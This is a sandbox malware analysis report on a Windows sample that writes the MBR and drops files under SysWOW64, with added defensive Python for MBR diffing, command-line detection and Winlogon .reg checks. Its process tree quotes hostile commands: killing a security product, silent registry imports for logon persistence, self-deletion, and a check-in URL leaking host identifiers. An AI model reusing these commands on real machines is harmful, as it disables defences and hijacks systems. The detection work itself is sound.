Analysis

  • max time kernel
    170s
  • max time network
    174s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/09/2022, 11:21

General

  • Target

    d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe

  • Size

    208KB

  • MD5

    1690e0408b941cfe9f8d8ffe46bb9481

  • SHA1

    03d3a9c8e5bff263caa06c4795bd4dca2d1561c7

  • SHA256

    d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190

  • SHA512

    02a272ca995f123df7becf79b4b3a17b11f5fbcfbcac070c001d20b79a07035cdc99b10a72554728591b6370e3eedb58649dc4fff102322fc2fa06ecb67d6bc6

  • SSDEEP

    6144:jZA/L880NEJji+5rqqULirD2Ei/NjO50p8I4cC:je/L880NEJjBdrm/fGI4D

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to open connected storage/optical drives. The sandbox labels this as likely ransomware behaviour, but in this run it is consistent with the raw-disk access needed for the MBR write flagged above rather than with any file encryption.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies registry class 10 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

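The "Writes to the Master Boot Record" and "Enumerates physical storage devices" signatures above only say that sector 0 was opened for writing; they do not say what changed. The check a responder wants is to dump sector 0 of the affected disk and compare it, field by field, against a baseline taken from a known-good image of the same build. The script below is an added example, not part of this report or of the sample's code: it parses a classic MBR (446 bytes of bootstrap code, four 16-byte partition entries, the 0x55AA signature), hashes the bootstrap code, and reports what differs from the baseline. The `KNOWN_GOOD` and `TAMPERED` sectors are constructed inline so the example runs offline; `read_physical_mbr` shows how the same sector is read from a live Windows host (administrator rights required). On a UEFI/GPT system sector 0 holds only a protective MBR whose bootstrap code the firmware never executes, so an MBR overwrite there corrupts the sector without gaining the pre-OS persistence the signature description assumes.

```python
import hashlib
import struct

MBR_SIZE = 512
BOOTSTRAP_LEN = 446       # bootstrap code occupies bytes 0..445
PART_TABLE_OFF = 446      # four 16-byte partition entries follow
SIGNATURE_OFF = 510       # 0x55 0xAA boot signature at the end of the sector
PART_ENTRY = "<B3xB3xII"  # status, (CHS start skipped), type, (CHS end skipped), LBA start, sector count


def parse_mbr(sector):
    """Decode a 512-byte MBR into its bootstrap hash, partition table and signature state."""
    if len(sector) != MBR_SIZE:
        raise ValueError("MBR must be exactly %d bytes" % MBR_SIZE)
    bootstrap = sector[:BOOTSTRAP_LEN]
    partitions = []
    for i in range(4):
        status, ptype, lba_start, sectors = struct.unpack_from(PART_ENTRY, sector, PART_TABLE_OFF + 16 * i)
        if ptype != 0:  # type 0 marks an unused entry
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "signature_ok": sector[SIGNATURE_OFF:] == b"\x55\xaa",
        "bootstrap_sha256": hashlib.sha256(bootstrap).hexdigest(),
        "bootstrap_is_blank": not any(bootstrap),
        "partitions": partitions,
    }


def diff_mbr(baseline, observed):
    """List what changed between a known-good sector 0 and the one read from the host."""
    base, obs = parse_mbr(baseline), parse_mbr(observed)
    issues = []
    if not obs["signature_ok"]:
        issues.append("boot signature 0x55AA missing")
    if obs["bootstrap_sha256"] != base["bootstrap_sha256"]:
        issues.append("bootstrap code differs from baseline")
    if obs["partitions"] != base["partitions"]:
        issues.append("partition table differs from baseline")
    return issues


def read_physical_mbr(drive_index=0):
    """Read sector 0 of a physical disk on a live Windows host (needs administrator rights)."""
    with open(r"\\.\PhysicalDrive%d" % drive_index, "rb") as disk:
        return disk.read(MBR_SIZE)


def build_mbr(bootstrap, partitions):
    """Assemble a constructed MBR for testing; partitions are (bootable, type, lba_start, sectors)."""
    sector = bytearray(MBR_SIZE)
    sector[:len(bootstrap)] = bootstrap
    for i, (bootable, ptype, lba_start, sectors) in enumerate(partitions):
        struct.pack_into(PART_ENTRY, sector, PART_TABLE_OFF + 16 * i,
                         0x80 if bootable else 0x00, ptype, lba_start, sectors)
    sector[SIGNATURE_OFF:] = b"\x55\xaa"
    return bytes(sector)


# Constructed baseline: the usual opening instructions of a Windows MBR
# (xor ax,ax / mov ss,ax / mov sp,7c00h) padded with NOPs, one bootable NTFS partition.
KNOWN_GOOD = build_mbr(b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 439,
                       [(True, 0x07, 2048, 1_000_000)])
# Constructed tampered copy: same partition table and signature, bootstrap code replaced.
TAMPERED = build_mbr(b"\xeb\xfe" + b"\x00" * 444, [(True, 0x07, 2048, 1_000_000)])

if __name__ == "__main__":
    for name, sector in (("baseline", KNOWN_GOOD), ("tampered", TAMPERED)):
        print(name, diff_mbr(KNOWN_GOOD, sector) or "no differences")
```

To apply this to a real incident, save `read_physical_mbr()` output from the affected host and a baseline from a clean machine of the same build, then run `diff_mbr` on the two; a changed bootstrap hash with an unchanged partition table is the pattern a bootkit leaves, while a missing signature or altered table points at destructive overwriting.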
Processes

  • C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe
    "C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4628
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im ZhuDongFangyu.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:636
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.baigezi.com/shenjingyuan/get.asp?mac=5203DB9D3EF&makedate=QM00013&comput=Home&ver=79&userid=0001
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5084
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5084 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1624
    • C:\Windows\SysWOW64\3682\takesoft.exe
      C:\Windows\system32\3682\takesoft.exe C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe===
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:32
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c regedit /s "C:\Windows\SysWOW64\3682\test.reg"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3896
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s "C:\Windows\SysWOW64\3682\test.reg"
          4⤵
          • Modifies WinLogon for persistence
          • Runs .reg file with regedit
          PID:3468
      • C:\Windows\SysWOW64\3682\io5v11ce.exe
        C:\Windows\SysWOW64\3682\io5v11ce.exe
        3⤵
        • Modifies visibility of file extensions in Explorer
        • Executes dropped EXE
        • Drops file in System32 directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:864
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im ZhuDongFangyu.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4188
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ping 127.0.0.1 -n 1 && del "C:\Windows\SysWOW64\3682\io5v11ce.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1004
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 1
            5⤵
            • Runs ping.exe
            PID:1444
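The process tree above contains the behaviours worth turning into detections: `taskkill /f /im ZhuDongFangyu.exe` (the Qihoo 360 active-defence process) run twice, a silent `regedit /s` import of a `.reg` file dropped under `SysWOW64\3682`, dropped executables run from that numbered subdirectory, the `ping 127.0.0.1 -n 1 && del` idiom that delays long enough for the process to exit before deleting its own binary, and Internet Explorer launched with a check-in URL that leaks the MAC address, computer name and a user id in the query string. The script below is an added example, not part of this report or the sample: it runs those rules over the command lines copied from the tree above. `SECURITY_PROCESSES` and `HOST_ID_PARAMS` are assumed watchlists to be extended for your own environment.

```python
import re
from urllib.parse import parse_qs, urlparse

SAMPLE = "d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe"
CHECKIN_URL = ("http://www.baigezi.com/shenjingyuan/get.asp"
               "?mac=5203DB9D3EF&makedate=QM00013&comput=Home&ver=79&userid=0001")

# (pid, command line) pairs copied from the process tree in the report.
PROCESS_TREE = [
    (4628, r'"C:\Users\Admin\AppData\Local\Temp\%s"' % SAMPLE),
    (636, "taskkill /f /im ZhuDongFangyu.exe"),
    (5084, r'"C:\Program Files\Internet Explorer\iexplore.exe" ' + CHECKIN_URL),
    (32, r"C:\Windows\system32\3682\takesoft.exe C:\Users\Admin\AppData\Local\Temp\%s===" % SAMPLE),
    (3896, r'cmd.exe /c regedit /s "C:\Windows\SysWOW64\3682\test.reg"'),
    (3468, r'regedit /s "C:\Windows\SysWOW64\3682\test.reg"'),
    (864, r"C:\Windows\SysWOW64\3682\io5v11ce.exe"),
    (4188, "taskkill /f /im ZhuDongFangyu.exe"),
    (1004, r'cmd /c ping 127.0.0.1 -n 1 && del "C:\Windows\SysWOW64\3682\io5v11ce.exe"'),
    (1444, "ping 127.0.0.1 -n 1"),
]

# Assumed watchlists: processes of endpoint-security products that malware tries to
# kill (ZhuDongFangyu.exe belongs to Qihoo 360), and query parameter names that carry
# host identity in the check-in URL seen above.
SECURITY_PROCESSES = {"zhudongfangyu.exe"}
HOST_ID_PARAMS = {"mac", "comput", "userid"}

TASKKILL_RE = re.compile(r"taskkill\b.*?/im\s+(\S+)")
REG_IMPORT_RE = re.compile(r'\bregedit(\.exe)?\s+/s\s+"?[a-z]:\\windows\\(system32|syswow64)\\')
PING_DELETE_RE = re.compile(r"\bping\s+127\.0\.0\.1\b.*&&\s*del\b")
NUMBERED_DIR_RE = re.compile(r'\\(system32|syswow64)\\\d+\\[^\\\s"]+\.exe')
URL_RE = re.compile(r"https?://\S+")


def checkin_params(url):
    """Return the query parameters of a check-in URL as single strings."""
    return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}


def classify(cmdline):
    """Return the list of rule names that fire on one command line."""
    hits = []
    low = cmdline.lower()
    m = TASKKILL_RE.search(low)
    if m and m.group(1) in SECURITY_PROCESSES:
        hits.append("kills security product process")
    if REG_IMPORT_RE.search(low):
        hits.append("silent .reg import from a system directory")
    if PING_DELETE_RE.search(low):
        hits.append("ping-delay self-deletion")
    if NUMBERED_DIR_RE.search(low):
        hits.append("executable in numbered System32 subdirectory")
    url = URL_RE.search(cmdline)
    if url and "iexplore" in low:
        leaked = sorted(k for k in checkin_params(url.group(0)) if k in HOST_ID_PARAMS)
        if leaked:
            hits.append("browser check-in leaking host identifiers: " + ",".join(leaked))
    return hits


def triage(tree):
    """Flatten (pid, command line) pairs into (pid, rule) hits."""
    return [(pid, hit) for pid, cmd in tree for hit in classify(cmd)]


def hits_by_pid(tree):
    """Group the hits of triage() by pid for reporting."""
    grouped = {}
    for pid, hit in triage(tree):
        grouped.setdefault(pid, []).append(hit)
    return grouped


if __name__ == "__main__":
    for pid, hits in sorted(hits_by_pid(PROCESS_TREE).items()):
        print(pid, "; ".join(hits))
```

The ping-and-delete rule is deliberately anchored on `127.0.0.1` followed by `&& del`, since `ping` alone (PID 1444 here) is noise; likewise a `regedit /s` import is only flagged when the file sits under a system directory, which is where legitimate software rarely drops user-writable `.reg` files.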

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Windows\SysWOW64\3682\dasoft.encode

    Filesize

    21KB

    MD5

    cc52b4148c16a0e8158ef3e8ddbec04d

    SHA1

    217645a0d99809fbef89a6e1a2864ec3271aa21d

    SHA256

    25be46d9c91c13105ccbe57c88c50dd2a8618e1edd94d02305c0128ed3e947c6

    SHA512

    72fc6ef224cd198fda822a5e65859921faac90d30eb5503e00593f4d7c964696d5bc6a538a36b005be78e72466ccb6b2792969bc3ff776ba25e48ef19eed3830

  • C:\Windows\SysWOW64\3682\io5v11ce.exe

    Filesize

    21KB

    MD5

    fda95ce112398a6472a4b0b28a67258c

    SHA1

    2f30086207b0ac0395830c529f2cecd05f867706

    SHA256

    b1682151ee4fbab8c581da5cef36ae621670f00414fad7e254fb3573a0cce2d8

    SHA512

    9adaec5a396dae16a01c5595212093428d633394e39fde48b099f6180ca0ce7e4599c3edc4f3b1bb68364f6f908030794bf7b5470cef168ab92dee22e2d7072b

  • C:\Windows\SysWOW64\3682\takesoft.exe

    Filesize

    12KB

    MD5

    a5241366618c5617785aeffa02fd0586

    SHA1

    dac0682ec1f9eebcefedca0d0b81052f4e45a889

    SHA256

    898260e02a4348b63aa13ccfd293449fec88f158a08a4c000f3f5b31953115c4

    SHA512

    91d1e7026e3f525ed029bc556485b7a845968e074df5871e19c4312c5390298203ffd9e8d5e57aa27e9eba083f3d6be459e4826cbd92c1b0d9b2147f044fe2f8

  • C:\Windows\SysWOW64\3682\test.reg

    Filesize

    206B

    MD5

    aafbc515e56620a59332edb997355b08

    SHA1

    c3927a56cf76eb7e4005c64393945349c9920c7e

    SHA256

    adc1b5de2e1f76368949fc90372c25d0ce06a60f63100a264d1b3c623ff7e69b

    SHA512

    a574404eaa573231163bef3424cccb5aee52539c4b8d4c4896dd2e6808a35159dd69e96dd135743ed83589af34bc701fe615e8925967cd81dce7a47d59392254

  • memory/32-141-0x0000000000400000-0x000000000040A000-memory.dmp

    Filesize

    40KB

  • memory/32-157-0x0000000000400000-0x000000000040A000-memory.dmp

    Filesize

    40KB

  • memory/864-153-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/864-155-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/4628-142-0x0000000000400000-0x0000000000434000-memory.dmp

    Filesize

    208KB

  • memory/4628-133-0x0000000000400000-0x0000000000434000-memory.dmp

    Filesize

    208KB
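The 206-byte `test.reg` listed above is what `regedit /s` imports to produce the "Modifies WinLogon for persistence" signature, and the same mechanism is the likely source of the "Modifies visibility of file extensions in Explorer" hit on `io5v11ce.exe`. The report does not reproduce the file's contents, so the `.reg` text below is constructed for illustration and should not be read as the real file. The parser and watchlist are an added example, not code from this report or the sample: it reads the Regedit 5.00 export format, unescapes quoted string data, and reports writes to the Winlogon values that execute code at logon (`Shell`, `Userinit`) when they differ from their stock values, plus any write to `HideFileExt`. The stock values in `WATCHLIST` are assumed for a default Windows 10 install.

```python
# Constructed .reg content in Regedit 5.00 export format. The real test.reg
# from the report is not reproduced here; these values are assumed.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,C:\\Windows\\SysWOW64\\3682\\takesoft.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt"=dword:00000001
'''

WINLOGON = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon"
EXPLORER_ADV = r"hkey_current_user\software\microsoft\windows\currentversion\explorer\advanced"

# (key, value name, stock data or None, description). None means any write is reported.
# Stock data are assumed defaults for a clean Windows 10 x64 install.
WATCHLIST = [
    (WINLOGON, "shell", "explorer.exe", "Winlogon Shell replaced (runs at every logon)"),
    (WINLOGON, "userinit", r"c:\windows\system32\userinit.exe,", "Winlogon Userinit replaced"),
    (EXPLORER_ADV, "hidefileext", None, "file extensions hidden in Explorer"),
]


def parse_reg(text):
    """Parse a Regedit 5.00 export into {key: {value_name: data}}.

    Quoted REG_SZ data is unescaped; other types (dword:, hex:) are kept as the
    raw text after '='. Real .reg files on disk are usually UTF-16LE with a BOM,
    so read them with encoding="utf-16" before calling this.
    """
    result = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            name = name.strip().strip('"')
            data = data.strip()
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            result[current][name] = data
    return result


def reg_findings(text):
    """Return (description, value name, data) for every watched value the file writes."""
    keys = {k.lower(): v for k, v in parse_reg(text).items()}
    findings = []
    for key, name, stock, description in WATCHLIST:
        for value_name, data in keys.get(key, {}).items():
            if value_name.lower() == name and (stock is None or data.lower() != stock):
                findings.append((description, value_name, data))
    return findings


if __name__ == "__main__":
    for description, value_name, data in reg_findings(SAMPLE_REG):
        print("%s: %s = %s" % (description, value_name, data))
```

The same `reg_findings` check can be run over the live registry export (`reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" out.reg`) of a suspect host, which is a quicker first check than diffing whole hives.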